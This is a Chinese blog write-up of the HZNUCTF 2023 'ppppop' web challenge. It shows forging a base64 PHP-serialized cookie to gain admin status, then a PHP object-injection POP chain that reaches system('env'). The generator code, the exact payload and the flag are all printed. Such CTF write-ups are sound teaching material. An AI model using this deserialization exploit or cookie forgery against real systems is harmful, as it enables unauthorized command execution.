[HZNUCTF 2023 preliminary]ppppop

最新推荐文章于 2024-11-01 15:49:16 发布
最新推荐文章于 2024-11-01 15:49:16 发布
阅读量909 收藏 8
点赞数 4
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80243833/article/details/141642878
版权

[HZNUCTF 2023 preliminary]ppppop

点进去之后是一片空白
接着我们打开HackBar 然后我们看到cookie里面有一个base64编码:

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MDt9

利用在线工具解码得到:
在这里插入图片描述

O:4:"User":1:{s:7:"isAdmin";b:0;}

由于序列化中的b代表着Boolean,所以我试着把0改为1。然后用在线工具加密得到:
在这里插入图片描述

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MTt9

将新的编码加入到cookies 中,然后运行之后发现有回显,是一串php代码:

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

接着我们对代码进行审计:

这段 PHP 代码定义了两个类 A 和 B,并包含了一些对用户输入进行处理的逻辑。整体来看,代码中可能存在安全风险,尤其是在处理用户输入的 payload 时进行反序列化操作。

以下是对代码的详细解读:

<?php
error_reporting(0);关闭 PHP 的错误报告。
include('utils.php');包含名为 utils.php 的文件。

class A {
    public $className;用于存储一个类名
    public $funcName;用于存储一个方法名
    public $args;用于存储传递给方法的参数。

    public function __destruct() {   这是 PHP 
    的析构函数,当对象被销毁时自动调用
        $class = new $this->className; 根据存储的
         className 创建一个新的对象 $class$funcName = $this->funcName;将存储的
         funcName 赋值给变量 $funcName$class->$funcName($this->args);
        调用新创建对象的指定方法,并传入存储的参数。
    }
}

class B {
    public function __call($func, $arg) {  这是
     PHP 的魔术方法,当调用一个不可访问的方法时自动触发。
        $func($arg[0]);
    }在这个方法中,它将第一个参数 $arg[0](即传入的参
    数数组中的第一个元素)作为参数传递给存储在变量 $func
     中的函数进行调用。
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    从用户提交的 POST 请求中获取 payload 参数 ,对其进行
     base64 解码,然后将结果反转。
    unserialize($payload);对处理后的 payload 进行反序列化操作。
}

然后我们反序列化构造pop链,通过A类来触发B类中的__call从而实现任意命令,执行后的回显在class B的__call 魔术方法里,我们需要让func和arg成为我们需要的变量。所以我们构造pop链如下:

<?php
error_reporting(0);
include('utils.php');
 
class A {
    public $className="B";
    public $funcName="system";
    public $args="env";
 
    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}
 
class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}
 
$a=new A();
echo(base64_encode(strrev(serialize($a))));
?>

利用在线工具运行php代码得到:
在这里插入图片描述

然后我们构造payload:

payload=fTsidm5lIjozOnM7InNncmEiOjQ6czsibWV0c3lzIjo2OnM7ImVtYU5jbnVmIjo4OnM7IkIiOjE6czsiZW1hTnNzYWxjIjo5OnN7OjM6IkEiOjE6Tw

post 传参,运行得到flag:
在这里插入图片描述由此得到本题flag:
NSSCTF{34f387cb-4c56-4282-aeee-fce453a11d94}

Alpha first
关注
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过(1)
2401_84009579的博客
04-20 1093
机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过
m0_60607895的博客
05-05 1134
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。构造方法,在反序列化的时候自动执行,类似于php中的_常用payload(没有os模块)
(反序列化)[HZNUCTF 2023 preliminary]ppppop
weixin_73668856的博客
12-08 567
简单的
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1773
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
第四届浙江大学生ctf初赛web—pppop
weixin_43610673的博客
10-23 824
<?php class A1 { public $tmp1; public $tmp2; public function __construct() { echo "Enjoy Hacking!"; } public function __wakeup() { $this->tmp1->hacking(); } } class A2 { public $tmp1; pub
MT7621_ProgrammingGuide_Preliminary_Platform_decrypted.pdf
10-14
标题和描述中提到的《MT7621_ProgrammingGuide_Preliminary_Platform_decrypted.pdf》是一份MTK MT7621的开发编程指南,该芯片是由MediaTek(联发科)公司设计的,用于支持IEEE 802.11n/ac标准的高性能、低成本无线...
Preliminary study on ECT imaging of flames in porous media
02-20
This preliminary study for the first time investigated the feasibility of tomographic monitoring of flames in porous media, in which the cross-sectional profiles of flames inside a porous medium were ...
Exynos 4412 SCP_Users Manual_Ver.0.10.00_Preliminary0.rar
08-15
Exynos 4412 SCP 用户手册是针对三星的一款高性能应用处理器——Exynos 4412 SCP(System Control Processor)的官方文档。该处理器在移动设备领域具有广泛的运用,尤其是在智能手机和平板电脑中,为用户提供高效能...
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 603
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
HZNUCTF2023 web
weixin_63231007的博客
05-07 1885
HZNUCTF校赛 赛后复现
PHP反序列的两道题
qq_44640313的博客
03-28 504
php反序列化的学习
POP链构造
VZS_0的博客
02-23 1778
wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数。//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get。// md5($this->md51) == md5($this->md52) 弱等于。
HZNUCTF-ezflask
qq_44640313的博客
03-27 625
jinja2的注入
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1463
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全】|nessus使用
最新发布
yangdan_jiayou的博客
11-01 399
NFamily:Nessus 扫描插件的分类,用于将漏洞归类到不同的类别或家族中。CVSS:量化漏洞严重性的标准,通过计算得出一个分数,分数越高表示漏洞越严重。EPSS:预测漏洞被利用可能性的评分系统,帮助安全团队优先处理高风险的漏洞。VPR:基于风险的评分系统,帮助组织优先处理风险最高的漏洞。Sev:漏洞的严重性级别。
什么是护网(HVV)需要什么技术?(内附护网超全资料包)
小司机的奥拓
11-01 1403
护网行动是以公安部牵头的,用以评估企事业单位的网络安全的活动。具体实践中。公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。“护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多的单位都加入到护网行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。
preliminary 传感器
07-24
### 回答1: 初步的传感器是指最初的传感器,用于感知和测量环境中的物理量、化学量或生物量。这些传感器通常用于收集数据,以便进行进一步的分析和处理。 初步的传感器可以用于各种不同的应用领域,如环境监测、工业自动化、医疗诊断等。它们可以测量温度、湿度、压力、光照、声音等物理量,也可以测量气体浓度、水质、土壤成分等化学量,甚至可以测量心率、血压等生物量。 初步的传感器通常具有小巧、便携和低功耗的特点,以便于安装和使用。它们可以通过有线或无线的方式将收集到的数据传输给数据处理单元,然后进一步进行分析和应用。 初步的传感器的性能和精度通常较低,但在一些应用场景中足够使用。在进行精确测量或要求高度一致性的场景中,可能需要更复杂、更高精度的传感器来满足要求。 总之,初步的传感器是最早的传感器,用于感知和测量环境中各种物理、化学或生物的量。它们可以广泛用于各个领域,为数据采集和分析提供基础。随着科技的发展和需求的增加,传感器技术也越来越精细和复杂。 ### 回答2: Preliminary 传感器是一种用于收集初步信息或进行初步测量的传感器。它主要用于确认和验证数据,并为后续的研究和分析提供依据。 Preliminary 传感器可以通过使用多种技术来获取数据,包括光学、声波、电磁和加速度等。它可以测量环境中的不同参数,如温度、湿度、压力、光照和运动等。 与其他高精度传感器相比,preliminary 传感器通常具有较低的测量精确度和准确性。尽管如此,它们仍然可以提供足够的信息来评估某个环境或系统的基本特性。 preliminary 传感器通常应用于许多领域。在环境监测方面,它可以用于检测空气质量、水质、土壤含水量等,以便评估环境的健康状况。在工业应用中,preliminary 传感器可以帮助监测和控制生产过程中的温度、压力和湿度等参数,以确保产品质量和工艺稳定性。 此外,preliminary 传感器还可以用于智能家居系统,例如自动灯光控制和温度调节。它们可以通过监测周围环境的状态并与设定的条件进行比较,实现自动化控制和能源节约。 总而言之,preliminary 传感器提供了初步收集数据和测量环境参数的功能。尽管其测量精度较低,但它们可以在各种领域中发挥重要作用,为后续的研究和分析提供重要的参考依据。 ### 回答3: 初步传感器是指在某个领域或某项工作中,在进行深入研究或正式操作之前使用的传感器。这种传感器可以帮助人们对待测对象进行初步的观察、测量或监测。 初步传感器通常具有以下特点: 1. 快捷简易:初步传感器操作方便、使用简单。其设计和功能主要针对对待测对象的初步了解和探索,不需要过多的专业知识或复杂的操作步骤。 2. 低成本:初步传感器通常相对便宜,成本低廉。这样可以降低对待测对象的测试成本,以及在初步阶段对传感器的投入。 3. 多功能:初步传感器一般具备多种功能,可以根据不同需求进行测量、观测和监测。可以针对特定目标进行调整和适应,提供初步的数据和信息。 4. 基础应用:初步传感器广泛应用于科学研究、实验室试验、工程项目等领域。在进行具体实验或操作之前,可以通过初步传感器获得一些对象的基本特征或性质。这对进一步的研究和操作具有重要意义。 总之,初步传感器是一种方便、简单、低成本且多功能的传感器,可以在不破坏或影响待测对象的前提下,提供初步的观测、测量或监测数据。通过初步传感器的使用,人们可以更好地了解被测对象的性质和特征,为随后的研究或操作提供基础信息和决策依据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值